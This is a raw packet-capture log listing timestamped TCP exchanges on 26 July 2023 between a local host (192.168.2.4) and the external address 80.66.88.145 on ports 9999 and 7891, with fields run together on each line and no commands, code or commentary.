                                                        Jul 26, 2023 14:01:16.611161947 CEST497019999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:16.645031929 CEST99994970180.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:16.752796888 CEST497049999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:16.786209106 CEST99994970480.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:17.298692942 CEST497049999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:17.332231998 CEST99994970480.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:17.845773935 CEST497049999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:17.879286051 CEST99994970480.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:17.989850998 CEST497059999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:18.023366928 CEST99994970580.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:18.533186913 CEST497059999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:18.590215921 CEST99994970580.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:19.096314907 CEST497059999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:19.130830050 CEST99994970580.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:19.343842983 CEST497069999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:19.383395910 CEST99994970680.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:19.801110983 CEST497077891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:19.834755898 CEST78914970780.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:19.834856033 CEST497077891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:19.834906101 CEST497077891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:19.870748997 CEST78914970780.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:19.871012926 CEST78914970780.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:19.871033907 CEST78914970780.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:19.871062040 CEST497077891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:19.871112108 CEST497077891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:19.876703978 CEST497077891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:19.892653942 CEST497069999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:19.910164118 CEST497087891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:19.911758900 CEST78914970780.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:19.926814079 CEST99994970680.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:19.943942070 CEST78914970880.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:19.944116116 CEST497087891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:19.944116116 CEST497087891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:19.982505083 CEST78914970880.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:19.982532978 CEST78914970880.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:19.982628107 CEST497087891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:19.982789993 CEST78914970880.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:19.983088970 CEST497087891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:19.987334967 CEST497087891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:20.021074057 CEST78914970880.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:20.439600945 CEST497069999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:20.476485014 CEST99994970680.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:20.608046055 CEST497099999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:20.641484022 CEST99994970980.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:21.142771959 CEST497099999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:21.176506042 CEST99994970980.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:21.689762115 CEST497099999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:21.723001003 CEST99994970980.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:21.847862959 CEST497109999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:21.881231070 CEST99994971080.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:22.392935991 CEST497109999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:22.426639080 CEST99994971080.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:22.939821959 CEST497109999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:22.974634886 CEST99994971080.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:23.085031033 CEST497119999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:23.118896008 CEST99994971180.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:01:23.627378941 CEST497119999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:01:23.662477016 CEST99994971180.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:00.927994967 CEST497157891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:00.931356907 CEST497169999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:00.961850882 CEST78914971580.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:00.961965084 CEST497157891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:00.962183952 CEST497157891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:00.965502024 CEST99994971680.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:01.004143000 CEST78914971580.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:01.004174948 CEST78914971580.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:01.004198074 CEST78914971580.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:01.004300117 CEST497157891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:01.004300117 CEST497157891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:01.004723072 CEST497157891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:01.028232098 CEST497177891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:01.037998915 CEST78914971580.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:01.061676979 CEST78914971780.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:01.062431097 CEST497177891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:01.069787025 CEST497177891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:01.108280897 CEST78914971780.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:01.108319998 CEST78914971780.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:01.108464003 CEST497177891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:01.108652115 CEST78914971780.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:01.110415936 CEST497177891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:01.115856886 CEST497177891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:01.151561022 CEST78914971780.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:01.474411011 CEST497169999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:01.509088993 CEST99994971680.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:02.021331072 CEST497169999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:02.055414915 CEST99994971680.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:02.056346893 CEST497189999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:02.089660883 CEST99994971880.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:02.599500895 CEST497189999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:02.641977072 CEST99994971880.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:03.146486998 CEST497189999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:03.180859089 CEST99994971880.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:03.288168907 CEST497199999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:03.322976112 CEST99994971980.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:03.834054947 CEST497199999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:03.877072096 CEST99994971980.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:04.380899906 CEST497199999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:04.420496941 CEST99994971980.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:04.688087940 CEST497209999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:04.721606970 CEST99994972080.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:05.147707939 CEST497217891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:05.181451082 CEST78914972180.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:05.181652069 CEST497217891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:05.224750996 CEST497209999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:05.239020109 CEST497217891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:05.258352995 CEST99994972080.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:05.273132086 CEST78914972180.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:05.273372889 CEST78914972180.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:05.273463011 CEST497217891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:05.273566008 CEST78914972180.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:05.273622990 CEST497217891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:05.273643970 CEST497217891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:05.295468092 CEST497227891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:05.334557056 CEST78914972280.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:05.334728956 CEST497227891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:05.335280895 CEST497227891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:05.380939960 CEST78914972280.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:05.380976915 CEST78914972280.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:05.381000996 CEST78914972280.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:05.381103992 CEST497227891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:05.381683111 CEST497227891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:05.425672054 CEST78914972280.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:05.584157944 CEST497217891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:05.618590117 CEST78914972180.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:05.771795988 CEST497209999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:05.805382967 CEST99994972080.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:06.444715023 CEST497239999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:06.487299919 CEST99994972380.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:07.053061008 CEST497239999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:07.087132931 CEST99994972380.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:07.758995056 CEST497239999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:07.792361975 CEST99994972380.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:07.962213993 CEST497249999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:07.995671034 CEST99994972480.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:08.568836927 CEST497249999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:08.618976116 CEST99994972480.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:09.162559986 CEST497249999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:09.196039915 CEST99994972480.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:09.304306984 CEST497259999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:09.345258951 CEST99994972580.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:09.413664103 CEST497267891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:09.450139999 CEST78914972680.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:09.450227976 CEST497267891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:09.450376987 CEST497267891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:09.488392115 CEST78914972680.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:09.488487005 CEST78914972680.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:09.488603115 CEST497267891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:09.488679886 CEST78914972680.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:09.488807917 CEST497267891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:09.488876104 CEST497267891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:09.522140980 CEST78914972680.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:09.525751114 CEST497277891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:09.559201002 CEST78914972780.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:09.559370041 CEST497277891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:09.559622049 CEST497277891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:09.599529982 CEST78914972780.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:09.599540949 CEST78914972780.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:09.599673033 CEST497277891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:09.599724054 CEST78914972780.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:09.599808931 CEST497277891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:09.600296974 CEST497277891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:09.633341074 CEST78914972780.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:09.943921089 CEST497259999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:09.977546930 CEST99994972580.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:10.647104979 CEST497259999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:10.680660963 CEST99994972580.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:10.811219931 CEST497289999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:10.849333048 CEST99994972880.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:11.444257975 CEST497289999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:11.480199099 CEST99994972880.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:12.147255898 CEST497289999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:12.180593014 CEST99994972880.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:12.291512966 CEST497299999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:12.336298943 CEST99994972980.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:12.850455999 CEST497299999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:12.883972883 CEST99994972980.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:13.397294998 CEST497299999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:13.437426090 CEST99994972980.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:13.554652929 CEST497309999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:13.588006020 CEST99994973080.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:13.633811951 CEST497317891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:13.667268991 CEST78914973180.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:14.100496054 CEST497309999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:14.134071112 CEST99994973080.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:14.178596973 CEST497317891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:14.214457035 CEST78914973180.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:14.214540005 CEST497317891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:14.224826097 CEST497317891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:14.259831905 CEST78914973180.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:14.260210037 CEST78914973180.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:14.260371923 CEST497317891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:14.260819912 CEST78914973180.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:14.260905027 CEST497317891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:14.268057108 CEST497317891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:14.301250935 CEST78914973180.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:14.313519001 CEST497327891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:14.346992016 CEST78914973280.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:14.347109079 CEST497327891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:14.358042002 CEST497327891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:14.394020081 CEST78914973280.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:14.394069910 CEST78914973280.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:14.394229889 CEST497327891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:14.394381046 CEST78914973280.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:14.394872904 CEST497327891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:14.394901037 CEST497327891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:14.647438049 CEST497309999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:14.693577051 CEST99994973080.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:14.694282055 CEST497327891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:14.727766037 CEST78914973280.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:14.814651966 CEST497339999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:14.848220110 CEST99994973380.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:15.350591898 CEST497339999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:15.400350094 CEST99994973380.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:15.913162947 CEST497339999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:15.948308945 CEST99994973380.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:16.074054003 CEST497349999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:16.110502958 CEST99994973480.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:16.632042885 CEST497349999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:16.667377949 CEST99994973480.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:17.178884029 CEST497349999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:17.212503910 CEST99994973480.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:17.344142914 CEST497359999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:17.377582073 CEST99994973580.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:17.882112026 CEST497359999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:17.916420937 CEST99994973580.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:18.419538021 CEST497367891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:18.428988934 CEST497359999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:18.452986956 CEST78914973680.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:18.453102112 CEST497367891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:18.455609083 CEST497367891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:18.462570906 CEST99994973580.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:18.490295887 CEST78914973680.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:18.490720034 CEST78914973680.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:18.490823030 CEST497367891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:18.490993977 CEST78914973680.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:18.491045952 CEST497367891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:18.491126060 CEST497367891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:18.531483889 CEST78914973680.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:18.586268902 CEST497379999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:18.620959044 CEST99994973780.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:19.132236004 CEST497379999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:19.180512905 CEST99994973780.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:19.694725037 CEST497379999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:19.730369091 CEST99994973780.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:19.837583065 CEST497389999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:19.871072054 CEST99994973880.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:20.382283926 CEST497389999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:20.417279005 CEST99994973880.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:20.929222107 CEST497389999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:20.962733030 CEST99994973880.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:21.078957081 CEST497399999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:21.113245964 CEST99994973980.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:21.616739988 CEST497399999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:21.650288105 CEST99994973980.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:22.163672924 CEST497399999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:22.197329998 CEST99994973980.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:22.305180073 CEST497409999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:22.344732046 CEST99994974080.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:22.533299923 CEST497417891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:22.566931963 CEST78914974180.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:22.567013979 CEST497417891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:22.577147961 CEST497417891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:22.611957073 CEST78914974180.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:22.612055063 CEST78914974180.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:22.612103939 CEST497417891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:22.612376928 CEST78914974180.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:22.612467051 CEST497417891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:22.617712021 CEST497417891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:22.668087959 CEST78914974180.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:22.851243973 CEST497409999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:22.884601116 CEST99994974080.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:23.398197889 CEST497409999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:23.431689024 CEST99994974080.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:23.539403915 CEST497429999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:23.572987080 CEST99994974280.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:24.085705996 CEST497429999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:24.120204926 CEST99994974280.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:24.632673025 CEST497429999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:24.666358948 CEST99994974280.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:24.774507999 CEST497439999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:24.807987928 CEST99994974380.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:25.335875988 CEST497439999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:25.369348049 CEST99994974380.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:25.882832050 CEST497439999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:25.917807102 CEST99994974380.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:26.071011066 CEST497449999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:26.104496002 CEST99994974480.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:26.679748058 CEST497449999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:26.694592953 CEST497457891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:26.713416100 CEST99994974480.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:26.728247881 CEST78914974580.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:26.728533030 CEST497457891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:27.256772041 CEST497457891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:27.289096117 CEST497449999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:27.291158915 CEST78914974580.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:27.291178942 CEST78914974580.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:27.291346073 CEST78914974580.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:27.292088985 CEST497457891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:27.292088985 CEST497457891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:27.292088985 CEST497457891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:27.322508097 CEST99994974480.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:27.695472002 CEST497457891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:27.754061937 CEST78914974580.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:27.828303099 CEST497469999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:27.861816883 CEST99994974680.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:28.431891918 CEST497469999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:28.465296984 CEST99994974680.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:29.117413044 CEST497469999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:29.157625914 CEST99994974680.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:29.258999109 CEST497479999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:29.295903921 CEST99994974780.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:29.883208036 CEST497479999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:31.399561882 CEST497487891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:31.437393904 CEST78914974880.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:31.437568903 CEST497487891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:31.437777042 CEST497487891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:31.472570896 CEST78914974880.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:31.472636938 CEST78914974880.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:31.472729921 CEST497487891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:31.472848892 CEST78914974880.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:31.472893953 CEST497487891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:31.472960949 CEST497487891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:31.506905079 CEST78914974880.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:35.494034052 CEST497497891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:35.529850006 CEST78914974980.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:35.530157089 CEST497497891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:35.530431032 CEST497497891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:35.585592985 CEST78914974980.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:35.585633039 CEST78914974980.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:35.585798979 CEST497497891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:35.585956097 CEST78914974980.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:35.586020947 CEST497497891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:35.586314917 CEST497497891192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:35.621372938 CEST78914974980.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:35.899265051 CEST497479999192.168.2.480.66.88.145
                                                        Jul 26, 2023 14:02:35.939987898 CEST99994974780.66.88.145192.168.2.4
                                                        Jul 26, 2023 14:02:36.103234053 CEST497509999192.168.2.480.66.88.145
